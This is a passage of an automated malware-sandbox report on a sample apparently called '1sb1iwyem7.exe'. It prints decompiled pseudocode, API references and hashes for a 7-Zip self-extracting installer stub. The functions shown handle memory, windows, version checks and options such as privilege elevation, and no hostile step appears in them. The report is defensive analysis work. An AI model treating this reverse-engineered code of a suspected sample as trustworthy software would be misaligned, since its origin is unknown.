				_t15 = _a4;
				_t25 = __ecx;
				if((_t15 & 0x00000002) == 0) {
					_push( *((intOrPtr*)(__ecx + 8)));
					L0041C160();
					if((_t15 & 0x00000001) != 0) {
						_push(__ecx);
						L0041C160();
					}
					return _t25;
				}
				_t28 = __ecx - 4;
				_t22 =  *_t28;
				_t13 = _t22 * 0x18;
				_t23 = _t22 - 1;
				if(_t23 < 0) {
					L4:
					if((_t15 & 0x00000001) != 0) {
						_push(_t28);
						L0041C160();
					}
					return _t28;
				}
				_t6 = _t25 + 8; // 0x8
				_t26 = _t13 + _t6;
				do {
					_t26 = _t26 - 0x18;
					_push( *_t26);
					L0041C160();
					_t23 = _t23 - 1;
				} while (_t23 >= 0);
				goto L4;
			}










                                          0x00416dd6
                                          0x00416ddb
                                          0x00416de0
                                          0x00416e16
                                          0x00416e19
                                          0x00416e22
                                          0x00416e24
                                          0x00416e25
                                          0x00416e2a
                                          0x00000000
                                          0x00416e2b
                                          0x00416de4
                                          0x00416de7
                                          0x00416dec
                                          0x00416def
                                          0x00416df0
                                          0x00416e04
                                          0x00416e07
                                          0x00416e09
                                          0x00416e0a
                                          0x00416e0f
                                          0x00000000
                                          0x00416e13
                                          0x00416df2
                                          0x00416df2
                                          0x00416df6
                                          0x00416df6
                                          0x00416df9
                                          0x00416dfb
                                          0x00416e00
                                          0x00416e01
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 20e58f5bd86f29084542dd9f6670e3fddfa2948c34d58c53b4fd5e4fcf8c5b10
                                          • Instruction ID: 5ed55d8bb8277f8b889ebe8e5b5cab0204d9acc34e3e71aa26cf118e3204e308
                                          • Opcode Fuzzy Hash: 20e58f5bd86f29084542dd9f6670e3fddfa2948c34d58c53b4fd5e4fcf8c5b10
                                          • Instruction Fuzzy Hash: C7F0243B3C16256AC225261DDC017DBBBA99F45760F16055FF84096263CA5AECD0899C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404B33, Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E00404B33(struct HWND__* __ecx) {
				WCHAR* _v16;
				char _v28;
				char _v40;
				int _t19;
				struct HWND__* _t31;
				void* _t33;

				_t31 = __ecx;
				E00404AF5( &_v16, __ecx, _t33);
				E00405546( &_v16, _t33);
				E00414803( &_v40, "%");
				E00414803( &_v28, L"%^");
				E00414BA6( &_v16,  &_v28,  &_v40);
				_push(_v28);
				L0041C160();
				_push(_v40);
				L0041C160();
				_t19 = SetWindowTextW(_t31, _v16);
				_push(_v16);
				L0041C160();
				return _t19;
			}









                                          0x00404b3a
                                          0x00404b41
                                          0x00404b49
                                          0x00404b56
                                          0x00404b63
                                          0x00404b73
                                          0x00404b78
                                          0x00404b7b
                                          0x00404b80
                                          0x00404b83
                                          0x00404b8e
                                          0x00404b94
                                          0x00404b99
                                          0x00404ba3

                                          APIs
                                            • Part of subcall function 00404AF5: GetWindowTextLengthW.USER32(?), ref: 00404B02
                                            • Part of subcall function 00404AF5: GetWindowTextW.USER32 ref: 00404B1C
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404B7B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404B83
                                          • SetWindowTextW.USER32(?,?), ref: 00404B8E
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00404B99
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@TextWindow$Lengthmemcpy
                                          • String ID:
                                          • API String ID: 396479319-0
                                          • Opcode ID: f229cd919cc25b1b92206c6ce626db26ee042fc82295a65d0685826aff1d7155
                                          • Instruction ID: 19ea8e6cb93d9cd3ba04d51c560a34885da5182b26a5070d63b94fab34289d6b
                                          • Opcode Fuzzy Hash: f229cd919cc25b1b92206c6ce626db26ee042fc82295a65d0685826aff1d7155
                                          • Instruction Fuzzy Hash: AFF0E176D440187ACB05FBD5EC438DEB7B99E44708B2041ABF501B2095DE756E85CA9C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00414283, Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 64%
                                          			E00414283(void** __ecx, void* _a4) {
				void* _v0;
				void* _v20;
				void* _t14;
				void* _t16;
				void* _t19;
				void* _t21;
				void* _t22;
				void** _t23;
				void* _t26;
				void* _t27;
				void** _t28;
				void** _t29;

				_t23 = __ecx;
				_t26 = _a4;
				_t28 = __ecx;
				if(_t26 < __ecx[1] || _t26 >= 0x40000000) {
					_push(0x41fbdc);
					_push( &_a4);
					_a4 = 0x13329ac;
					L0041C310();
					asm("int3");
					_t21 = _v20;
					_push(_t28);
					_push(_t26);
					_t29 = _t23;
					if(_t21 >= 0x40000000) {
						_push(0x41fbdc);
						_push( &_v0);
						_v0 = 0x13329ac;
						L0041C310();
					}
					_t11 = _t21 + 1; // 0x13329ad
					_t14 = _t11;
					_push(_t14);
					L0041C16C();
					_t27 = _t14;
					 *_t27 = 0;
					_push( *_t29);
					L0041C160();
					 *_t29 = _t27;
					_t29[2] = _t21;
					return _t14;
				} else {
					_t16 = _t26 + 1;
					_push(_t16);
					L0041C16C();
					_t22 = _t16;
					_t19 = memcpy(_t22,  *__ecx, __ecx[1] + 1);
					_push( *_t28);
					L0041C160();
					_t28[2] = _t26;
					 *_t28 = _t22;
					return _t19;
				}
			}















                                          0x00414283
                                          0x00414289
                                          0x0041428c
                                          0x00414291
                                          0x004142c9
                                          0x004142d1
                                          0x004142d2
                                          0x004142d9
                                          0x004142de
                                          0x004142e3
                                          0x004142e6
                                          0x004142e7
                                          0x004142e8
                                          0x004142f0
                                          0x004142f2
                                          0x004142fa
                                          0x004142fb
                                          0x00414302
                                          0x00414302
                                          0x00414307
                                          0x00414307
                                          0x0041430a
                                          0x0041430b
                                          0x00414310
                                          0x00414312
                                          0x00414315
                                          0x00414317
                                          0x0041431e
                                          0x00414321
                                          0x00414327
                                          0x0041429b
                                          0x0041429b
                                          0x0041429e
                                          0x0041429f
                                          0x004142a4
                                          0x004142ae
                                          0x004142b3
                                          0x004142b5
                                          0x004142bd
                                          0x004142c1
                                          0x004142c6
                                          0x004142c6

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@??3@ExceptionThrowmemcpy
                                          • String ID:
                                          • API String ID: 3462485524-0
                                          • Opcode ID: 48800b83895c4d5c180d0943daf6eba398b19e5afb00cb206730345c2231b4af
                                          • Instruction ID: 5b66cd78a0db593bdef5d09f9cd12a00abbc121f78fce6118f4eaf4c7a2e81d2
                                          • Opcode Fuzzy Hash: 48800b83895c4d5c180d0943daf6eba398b19e5afb00cb206730345c2231b4af
                                          • Instruction Fuzzy Hash: 6DF0BB75140208BFC710DF55DCC198BF7EDEF54798711492FF94583102D275A8C48BA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C140, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E0040C140(void* __ebx, intOrPtr* __ecx, void* __eflags) {
				void* _t3;
				void* _t7;
				intOrPtr* _t15;
				intOrPtr* _t16;

				_t15 = __ecx;
				EnterCriticalSection(0x4249f8);
				_t16 = _t15 + 0x10;
				if(E0040BEA0(_t16) != 0) {
					L4:
					_push(_t16);
					_t3 = E0040C0D0(0x422628);
				} else {
					_t7 = E0040BEA0(_t16);
					if(_t7 == 0) {
						E0040B810(_t16);
					}
					_t3 = E0040BFD0(_t15, _t16);
					if(_t7 == 0) {
						goto L4;
					}
				}
				LeaveCriticalSection(0x4249f8);
				return _t3;
			}







                                          0x0040c147
                                          0x0040c149
                                          0x0040c14f
                                          0x0040c15c
                                          0x0040c184
                                          0x0040c184
                                          0x0040c18a
                                          0x0040c15e
                                          0x0040c16a
                                          0x0040c16e
                                          0x0040c172
                                          0x0040c172
                                          0x0040c17a
                                          0x0040c182
                                          0x00000000
                                          0x00000000
                                          0x0040c182
                                          0x0040c194
                                          0x0040c19c

                                          APIs
                                          • EnterCriticalSection.KERNEL32(004249F8,?,?,0040C1CF,?,?,?,?,?,0041CA20,000000FF), ref: 0040C149
                                          • LeaveCriticalSection.KERNEL32(004249F8,?,?,?,?,0040C1CF,?,?,?,?,?,0041CA20,000000FF), ref: 0040C194
                                            • Part of subcall function 0040BEA0: memmove.MSVCRT ref: 0040BF0B
                                            • Part of subcall function 0040B810: memset.MSVCRT ref: 0040B869
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CriticalSection$EnterLeavememmovememset
                                          • String ID: (&B$(&B
                                          • API String ID: 2443406628-3506096430
                                          • Opcode ID: f016356fa7e24247763b21a98c0f9a686db0cf529d991d74a4701e524a56e4fd
                                          • Instruction ID: 853edd7aaeb107b7cb5601c09f28b255d6913e1c7a09ba2968700e737119d554
                                          • Opcode Fuzzy Hash: f016356fa7e24247763b21a98c0f9a686db0cf529d991d74a4701e524a56e4fd
                                          • Instruction Fuzzy Hash: B6E08C71382121628A1533393C55AFA261EDEC6348B45023BB6417B2C2CFAD184786FD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408183, Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00408183(void* __ecx) {
				struct tagLOGFONTW _v96;
				int _t8;
				long _t11;
				int _t15;

				if(( *0x42245c & 0x00000010) != 0) {
					_t8 = GetObjectW( *(__ecx + 0x34), 0x5c,  &_v96);
					if(_t8 != 0) {
						_v96.lfWeight = 0x2bc;
						_t11 = CreateFontIndirectW( &_v96);
						_t15 = _t11;
						if(_t15 != 0) {
							_t11 = SendMessageW(GetDlgItem( *(__ecx + 4), 0x4b5), 0x30, _t15, 0);
						}
						return _t11;
					}
				}
				return _t8;
			}







                                          0x00408193
                                          0x0040819e
                                          0x004081a6
                                          0x004081ad
                                          0x004081b4
                                          0x004081ba
                                          0x004081be
                                          0x004081d4
                                          0x004081d4
                                          0x00000000
                                          0x004081da
                                          0x004081a6
                                          0x004081dd

                                          APIs
                                          • GetObjectW.GDI32(?,0000005C,?), ref: 0040819E
                                          • CreateFontIndirectW.GDI32(?), ref: 004081B4
                                          • GetDlgItem.USER32 ref: 004081C8
                                          • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 004081D4
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CreateFontIndirectItemMessageObjectSend
                                          • String ID:
                                          • API String ID: 2001801573-0
                                          • Opcode ID: afbff07d09dddf9371f97f906327bbbd58aa03dbd1351fda712479fe90e32f0f
                                          • Instruction ID: d5b718cc934acb00f13f44d7e909b03c4c551f7785cdaa53379e29aff312fd17
                                          • Opcode Fuzzy Hash: afbff07d09dddf9371f97f906327bbbd58aa03dbd1351fda712479fe90e32f0f
                                          • Instruction Fuzzy Hash: 70F054B5900714ABD7205B94DD09F8B7BACAF48B15F048039AD52E51D5DBB4D4068B28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004038D4, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004038D4(struct HWND__* __ecx, struct tagPOINT* __edx) {
				struct HWND__* _t1;
				struct HWND__* _t7;
				struct HWND__* _t10;
				struct tagPOINT* _t12;

				_t10 = __ecx;
				_t12 = __edx;
				_t1 = GetParent(__ecx);
				_t7 = _t1;
				if(_t7 != 0) {
					GetWindowRect(_t10, _t12);
					ScreenToClient(_t7, _t12);
					ScreenToClient(_t7, _t12 + 8);
					return 1;
				}
				return _t1;
			}







                                          0x004038d7
                                          0x004038da
                                          0x004038dc
                                          0x004038e2
                                          0x004038e6
                                          0x004038ea
                                          0x004038f8
                                          0x004038ff
                                          0x00000000
                                          0x00403903
                                          0x00403907

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ClientScreen$ParentRectWindow
                                          • String ID:
                                          • API String ID: 2099118873-0
                                          • Opcode ID: 4c92e9c479757e8e066bde25e06fea40a487b1c64e9eb2093d4279233fbb5f16
                                          • Instruction ID: 3d7e383402d4b386d472006189a1f244a9290001d11243c4274d9f08879646a2
                                          • Opcode Fuzzy Hash: 4c92e9c479757e8e066bde25e06fea40a487b1c64e9eb2093d4279233fbb5f16
                                          • Instruction Fuzzy Hash: F5E012B7A012256B931427B76C88CEB9F5CDDD65763064476F919D2210C9B8DC0185B4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409617, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00409617(void* __ecx, void* __edx, void* __eflags) {
				char _v84;
				void* _t7;
				void* _t16;
				void* _t18;

				_t18 = __ecx;
				E004075CF( &_v84, __edx, __eflags);
				_v84 = 0x41ef68;
				if(IsWindow( *0x4228c4) != 0 && IsBadReadPtr( *0x4228c8, 0x78) == 0) {
					_t16 =  *0x4228c8; // 0x0
					E0040816A(_t16, 8);
				}
				_t7 = E00407941( &_v84, 0x14,  *0x42274c, _t18,  *0x4228c4);
				E00407630(_t7,  &_v84);
				return _t7;
			}







                                          0x0040961e
                                          0x00409623
                                          0x0040962e
                                          0x0040963d
                                          0x00409651
                                          0x00409659
                                          0x00409659
                                          0x00409670
                                          0x0040967a
                                          0x00409683

                                          APIs
                                            • Part of subcall function 004075CF: KiUserCallbackDispatcher.NTDLL ref: 00407611
                                            • Part of subcall function 004075CF: GetSystemMetrics.USER32 ref: 0040761F
                                          • IsWindow.USER32(004227F0), ref: 00409635
                                          • IsBadReadPtr.KERNEL32(00000078), ref: 00409647
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CallbackDispatcherMetricsReadSystemUserWindow
                                          • String ID: hA
                                          • API String ID: 388239213-2144240161
                                          • Opcode ID: 803d6675f1e9c557cdb4753af97064b13971d40bfe3ea479c8e0607b0e8b4fdd
                                          • Instruction ID: 53677f3ef0150f60e2e917f8fddf25ce213b8b63ff0de2c48ed14ab9013a4a30
                                          • Opcode Fuzzy Hash: 803d6675f1e9c557cdb4753af97064b13971d40bfe3ea479c8e0607b0e8b4fdd
                                          • Instruction Fuzzy Hash: 26F0F031B44214BBCB257BE19D05AD93BB5EF14704F40013AE901B61E0DFB5980ACBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004055E3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                          Download Yara Rule
                                          APIs
                                          • _wtol.MSVCRT(00000000,00000030,GUIFlags,00405851,?,00422148,?,?,004065DA,?), ref: 00405580
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _wtol
                                          • String ID: MiscFlags$t'B
                                          • API String ID: 2131799477-2400136614
                                          • Opcode ID: b0616bf743ce42b5889569d14b64b5fb774e87ef02abb3a457d94b56771745ef
                                          • Instruction ID: 8d513a133ae9621e771551aaefc0b9698f2617da03fa0e1a1750c1a50823643d
                                          • Opcode Fuzzy Hash: b0616bf743ce42b5889569d14b64b5fb774e87ef02abb3a457d94b56771745ef
                                          • Instruction Fuzzy Hash: C8F0A0A1C24820B1CB3846096CC843F62A3DE6E350B38053BE442F12E8C33C8CC29D5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405A8F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405A8F() {

				MessageBoxA(0, "Could not allocate memory", "7-Zip SFX", 0x10);
				return 0;
			}



                                          0x00405a9d
                                          0x00405aa5

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Message
                                          • String ID: 7-Zip SFX$Could not allocate memory
                                          • API String ID: 2030045667-3806377612
                                          • Opcode ID: a489221f4986250d18ead154f7d6b7669e8a2de19b10e5f35446c668475b1b6f
                                          • Instruction ID: a049ee2480a7b50d5fda29a44b7701a856f8a6ed2be67fd4fe0477549e7dcf93
                                          • Opcode Fuzzy Hash: a489221f4986250d18ead154f7d6b7669e8a2de19b10e5f35446c668475b1b6f
                                          • Instruction Fuzzy Hash: DFB012743C830421D10083210C0FFC411509B0CF06F1048117902A80C2C5C87080910E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Analysis Process: 1sb1iwyem7.exe PID: 6268 Parent PID: 5384 1sb1iwyem7.exeCOMMON

                                          Executed Functions

                                          Function 00406024, Relevance: 197.1, APIs: 70, Strings: 42, Instructions: 1139windowCOMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00406024(void* __edx) {
				void* __edi;
				void* __esi;
				signed int _t218;
				short* _t237;
				void* _t238;
				signed int _t239;
				signed int _t240;
				signed int _t243;
				signed int _t248;
				signed int _t251;
				signed int _t255;
				signed int _t256;
				void* _t259;
				signed int _t262;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t278;
				signed int _t281;
				signed short _t283;
				intOrPtr _t287;
				signed short* _t289;
				signed int _t292;
				signed int _t293;
				void* _t294;
				short* _t299;
				long _t315;
				signed int _t322;
				signed short* _t328;
				signed int _t336;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t346;
				signed int _t348;
				signed int _t350;
				signed int _t358;
				signed int _t360;
				signed int _t367;
				signed int _t383;
				short _t400;
				signed short* _t401;
				signed int _t402;
				intOrPtr _t406;
				intOrPtr _t409;
				signed int _t412;
				intOrPtr _t416;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t425;
				signed int _t429;
				signed int _t430;
				signed short _t431;
				signed int _t434;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed short _t445;
				void* _t446;
				void* _t452;
				signed int _t455;
				signed int _t456;
				intOrPtr _t484;
				intOrPtr _t492;
				signed int _t509;
				signed int _t510;
				intOrPtr _t546;
				intOrPtr _t558;
				void* _t573;
				signed int _t592;
				signed int _t594;
				signed char _t596;
				signed int _t598;
				signed int _t603;
				WCHAR* _t605;
				void* _t610;
				intOrPtr _t612;
				signed int _t614;
				signed int _t616;
				void* _t641;
				signed int _t647;
				intOrPtr _t650;
				intOrPtr _t658;
				intOrPtr _t660;
				intOrPtr _t665;
				intOrPtr _t666;
				void* _t676;
				signed int _t679;
				void* _t682;
				signed int _t684;
				signed int _t685;
				intOrPtr _t689;
				signed short* _t690;
				signed int _t696;
				signed int _t697;
				void* _t698;
				signed int _t701;
				signed int _t703;
				signed int _t704;
				WCHAR* _t705;
				unsigned int _t712;
				signed int _t714;
				void* _t720;
				void* _t722;
				void* _t723;
				void* _t725;
				void* _t728;

				_t626 = __edx;
				_t720 = _t722 - 0x68;
				_t723 = _t722 - 0x2d4;
				__imp__?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z(E00405A8F, _t682, _t698, _t446);
				E00403834(__edx); // executed
				 *(_t720 - 0x26c) = 0x114;
				if(GetVersionExW(_t720 - 0x26c) == 0 ||  *((intOrPtr*)(_t720 - 0x25c)) != 2) {
					L215:
					MessageBoxA(0, "Sorry, this program requires Microsoft Windows 2000 or later.", "7-Zip SFX", 0x10);
					_t218 = 0x14;
					goto L216;
				} else {
					_t731 =  *((intOrPtr*)(_t720 - 0x268)) - 5;
					if( *((intOrPtr*)(_t720 - 0x268)) < 5) {
						goto L215;
					}
					";!@InstallEnd@!" = 0x3b;
					";!@Install@!UTF-8!" = 0x3b;
					E004147DF(E004147DF(E004147DF(_t216, _t720 + 0x24), _t720 - 0x48), _t720 - 8); // executed
					E0040541A(_t626); // executed
					E00414864(_t720 - 8, E00403022(GetCommandLineW(), _t720 + 0x24));
					E0040457E(_t720 - 8, _t682, _t731);
					_t684 =  *(_t720 - 8);
					E00404F69(L"SfxVarModulePlatform", L"x86", _t731, 1);
					E00404F69(L"SfxVarSystemPlatform", E00403EF5(_t731), _t731, 1);
					E00404F69(L"SfxVarCmdLine0", GetCommandLineW(), _t731, 1);
					wsprintfW(E0040420B(_t720 + 0x24, _t230, 0x20), L"%d",  *0x422730 & 0x0000ffff);
					_t725 = _t723 + 0xc;
					E004041F0(_t720 + 0x24);
					E00404F69(L"SfxVarSystemLanguage",  *((intOrPtr*)(_t720 + 0x24)), _t731, 1);
					_t237 = E004056BA(_t684, L"sfxlang");
					if(_t237 == 0 ||  *_t237 != 0x3a) {
						L8:
						_t238 = E004056BA(_t684, L"sfxversion");
						_t736 = _t238;
						if(_t238 == 0) {
							_t239 = E004056BA(_t684, L"sfxwaitall");
							__eflags = _t239;
							if(_t239 == 0) {
								_t635 = L"sfxelevation";
								 *((char*)(_t720 + 0x67)) = 0;
								_t240 = E004056BA(_t684, L"sfxelevation");
								__eflags = _t240;
								if(_t240 != 0) {
									 *((char*)(_t720 + 0x67)) = 1;
									_t684 = _t240;
								}
								_t243 = GetModuleFileNameW(0, E0040420B(0x422844, _t635, 0x208), 0x208);
								__eflags = _t243;
								if(_t243 != 0) {
									E004041F0(0x422844);
									_t636 = L"sfxtest";
									_t701 = E004056BA(_t684, L"sfxtest");
									__eflags = _t701;
									if(_t701 == 0) {
										L66:
										E004148C7(0x422794, 0x422844);
										E004148C7(0x4227ac, 0x422844);
										_t248 = E00403813(0x422844, __eflags);
										__eflags = _t248;
										if(__eflags >= 0) {
											_t605 =  *0x422794; // 0x4652cc0
											 *0x422798 = _t248;
											 *((short*)(_t248 + _t248 + _t605)) = 0;
											_t406 =  *0x422844; // 0x4654af0
											_t38 = _t406 + 2; // 0x422846
											E00414864(0x4227ac, _t248 + _t248 + _t38);
											_t409 =  *0x422844; // 0x4654af0
											_t40 = _t409 + 2; // 0x422846
											E00414864(0x422890, _t248 + _t248 + _t40);
											_t412 = E00414A79(0x422890, 0x2e);
											__eflags = _t412;
											if(_t412 > 0) {
												_t636 =  *0x422890; // 0x4652520
												__eflags = 0;
												 *0x422894 = _t412;
												 *((short*)(_t636 + _t412 * 2)) = 0;
											}
											E004148C7(0x42285c, 0x422890);
											_t610 = 4;
											E00414922(0x42285c, E00403CE0(_t610));
											_t416 =  *0x422890; // 0x4652520
											_t612 =  *0x42285c; // 0x46505d0
											 *0x422738 = _t416;
											 *0x422760 = _t612;
											 *0x422764 = _t416;
										}
										E00414864(0x422850, E00403EF5(__eflags));
										_t452 = 0x4227b8;
										_t251 = E004012CF(0x4227b8, __eflags,  *0x422844);
										__eflags = _t251;
										if(_t251 != 0) {
											E00405EEB(E004143C2(_t251, _t720 + 0x58), 0x4227a0);
											_t484 =  *0x4227bc; // 0x566858
											_t637 = 0; // executed
											_t255 = E00405319(_t484, 0, __eflags, _t720 + 0x58); // executed
											_t703 = _t255;
											__eflags = _t703;
											if(_t703 == 0) {
												__eflags =  *0x4228d8;
												if( *0x4228d8 != 0) {
													L84:
													__eflags =  *0x4228d8 - 4;
													if( *0x4228d8 == 4) {
														L119:
														_push( *((intOrPtr*)(_t720 + 0x58)));
														L0041C160();
														goto L10;
													}
													_t256 =  *0x422158; // 0x1
													_t704 = 0x422158;
													while(1) {
														__eflags = _t256;
														if(__eflags == 0) {
															break;
														}
														wsprintfW(_t720 - 0xa0, L"SfxString%d", _t256);
														_t725 = _t725 + 0xc;
														_t259 = E00403CE0( *_t704); // executed
														_t637 = _t259;
														E00404F69(_t720 - 0xa0, _t259, __eflags, 0);
														_t704 = _t704 + 0x10;
														__eflags = _t704;
														_t256 =  *_t704;
													}
													_t488 = _t452;
													E004053FB(_t452, _t637, _t684);
													_t262 = E004016FE(__eflags);
													 *(_t720 + 0x10) = _t262;
													__eflags = _t262;
													if(_t262 != 0) {
														E00405729(_t488);
														_t705 = E00404F59();
														__eflags = _t705;
														if(__eflags == 0) {
															L101:
															E00405EEB(E00401303(_t452, __eflags), 0x4227a0);
															_t492 =  *0x4227bc; // 0x566858
															E00405319(_t492, 0, __eflags, 0); // executed
															E00405729(_t492);
															E00401368();
															E004016FE(__eflags);
															E00405729(_t452);
															__eflags =  *((char*)(_t720 + 0x67));
															if( *((char*)(_t720 + 0x67)) != 0) {
																L107:
																 *(_t720 + 0x3c) = 0;
																_t272 = E00404F59();
																while(1) {
																	_t685 = _t272;
																	__eflags = _t685;
																	if(_t685 == 0) {
																		break;
																	}
																	E00414803(_t720 + 0x40, _t685);
																	_t641 = 0x3d;
																	_t274 = E0041420C( *((intOrPtr*)(_t720 + 0x40)), _t641);
																	__eflags = _t274;
																	if(__eflags <= 0) {
																		_push( *((intOrPtr*)(_t720 + 0x40)));
																		L0041C160();
																		L113:
																		E00405D92();
																		__eflags =  *0x42245c - 0xffffffff;
																		if( *0x42245c == 0xffffffff) {
																			 *0x42245c = 0;
																		}
																		__eflags =  *0x4227cb; // 0x0
																		if(__eflags == 0) {
																			__eflags =  *0x4227c9; // 0x0
																			if(__eflags != 0) {
																				 *0x42245c =  *0x42245c & 0xfffffeff;
																				__eflags =  *0x42245c;
																			}
																			__imp__CoInitialize(0);
																			_t276 = E00404F59();
																			__eflags = _t276;
																			if(_t276 != 0) {
																				E00414864(0x42289c, _t276);
																				 *0x422740 = 1;
																			}
																			E00405517(0x42289c);
																			_t278 = E00404F59();
																			__eflags = _t278;
																			if(_t278 != 0) {
																				__imp___wtol(_t278);
																				 *0x422780 = _t278;
																			}
																			__eflags =  *0x4228e0; // 0x0
																			if(__eflags == 0) {
